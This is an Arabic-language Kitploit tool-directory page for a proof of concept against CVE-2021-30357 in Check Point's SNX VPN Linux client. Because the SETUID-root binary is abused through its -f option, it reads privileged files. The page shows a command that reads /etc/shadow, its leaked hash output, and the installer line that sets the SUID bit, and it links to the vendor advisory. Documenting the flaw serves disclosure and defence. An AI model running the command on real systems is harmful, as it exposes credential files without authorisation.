Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-30357_CheckPoint_SNX_VPN_PoC — إثبات المفهوم لقراءة ملف بصلاحيات مرتفعة من خلال عميل CheckPoint SNX VPN لنظام لينكس | Kitploit
أدوات/GitHubGitHub/joaovarelas/cve-2021-30357_checkpoint_snx_vpn_poc
تصعيد الامتيازاتماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراق
GitHubjoaovarelas/cve-2021-30357_checkpoint_snx_vpn_poc

CVE-2021-30357_CheckPoint_SNX_VPN_PoC

إثبات المفهوم لقراءة ملف بصلاحيات مرتفعة من خلال عميل CheckPoint SNX VPN لنظام لينكس

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
61منذ 3 سنواتلم تتم المراجعة بعد

CVE-2021-30357_CheckPoint_SNX_VPN_PoC

إثبات المفهوم لقراءة ملفات مميزة من خلال عميل CheckPoint SNX VPN Linux Client.

الإصدار المتأثر

  • CheckPointVPN_SNX_Linux_800007075.sh
  • MD5 Checksum: 4372e9936e2dfb1d1ebcef3ed4dd7787

الاستغلال

لاستغلال الثغرة، قم بتحميل أي ملف كملف تكوين SNX باستخدام المعامل -f. إذا لم يكن الملف ملف تكوين SNX صالحًا، فسيتم طرح خطأ وعرض خطأ في الصياغة، مما يؤدي إلى تسريب المحتوى حتى يتم العثور على فاصل السلسلة (مثل etc/shadow):

root@kitploit:~
$ /usr/bin/snx -f /etc/shadow

parsing of the file: /etc/shadow  failed: Line 1: unknown attribute 'root:$6$Mi[REDACTED]VwUSrc2ioKt.2Mex.yF.:18624:0:99999:7:::'

Valid attributes are:

   - server          SNX server to connet to
   - sslport         The SNX SSL port (if not default)
   - username        the user name

(...)

الثغرة

السبب هو أن الملف التنفيذي /usr/bin/snx يحتوي على بت SETUID ويتم تشغيله كمستخدم فائق (super-user)، ويتم تعيين ذلك أثناء التثبيت.

على وجه الخصوص، المتغير COMMAND_TO_RUN المعرّف في ملف التثبيت .sh (CheckPointVPN_SNX_Linux_800007075.sh):

root@kitploit:~
[...]
COMMAND_TO_RUN="install --owner=root --group=root --mode=u=rxs,g=x,o=x snx /usr/bin/snx; install --owner=root --group=root --mode=u=rx,g=rx,o=rx snx_uninstall.sh /usr/bin/snx_uninstall; install --directory --owner=root --group=root --mode=u=rwx /etc/snx; install --directory --owner=root --group=root --mode=u=rwx /etc/snx/tmp"

في المعامل --mode=u=rxs، يقوم الحرف s الأخير بتعيين بت SUID، مما يؤدي إلى تشغيل الملف الثنائي التنفيذي كجذر (root).

الإشعار الرسمي

  • https://support.checkpoint.com/results/sk/sk173513
  • https://vrls.ws/posts/2021/06/cve-2021-30357-check-point-software-vpn-arbitrary-file-read/
تنزيل الأداة